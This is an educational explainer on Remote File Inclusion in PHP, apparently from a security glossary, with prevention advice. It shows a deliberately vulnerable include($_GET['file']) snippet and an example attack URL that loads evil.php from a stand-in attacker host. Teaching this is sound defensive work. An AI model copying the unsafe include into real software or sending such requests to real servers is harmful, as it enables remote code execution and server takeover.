What is Remote File Inclusion (RFI)?

Remote File inclusion (RFI) refers to an inclusion attack wherein an attacker can cause the web application to include a remote file by exploiting a web application that dynamically includes external files or scripts. The consequences of a successful RFI attack include Information Disclosure and Cross-site Scripting (XSS) to Remote Code Execution.

Remote File Inclusion (RFI) usually occurs, when an application receives the path to the file that has to be included as an input without properly sanitizing it. This would allow an external URL to be supplied to the include statement.

The following is an example in PHP that is vulnerable to Remote File Inclusion (RFI).

/**
* Get the filename from a GET input
* Example - http://example.com/?file=filename.php
*/
$file = $_GET['file'];

/**
* Unsafely include the file
* Example - filename.php
*/
include($file);

In the above example, an attacker could make the following request to trick the application into executing a malicious script such as a webshell.

http://example.com/?file=http://attacker.com/evil.php

In this example, the remote file will be included and run with the user privileges the web application is running. That would allow an attacker to run any code they wanted on the web server, including writing files to gain persistence on the web server.

Preventing Remote File Inclusion (RFI) vulnerabilities

The best way to eliminate Remote File Inclusion (RFI) vulnerabilities is to avoid dynamically including files based on user input. If this is not possible, the application should maintain a whitelist of files that can be included in order to limit the attacker’s control over what gets included.

Additionally, in the case of PHP, most modern PHP configurations are configured with allow_url_include set to off, which would not allow malicious users to include remote files. This being said, Local File Inclusion (LFI) would still be possible.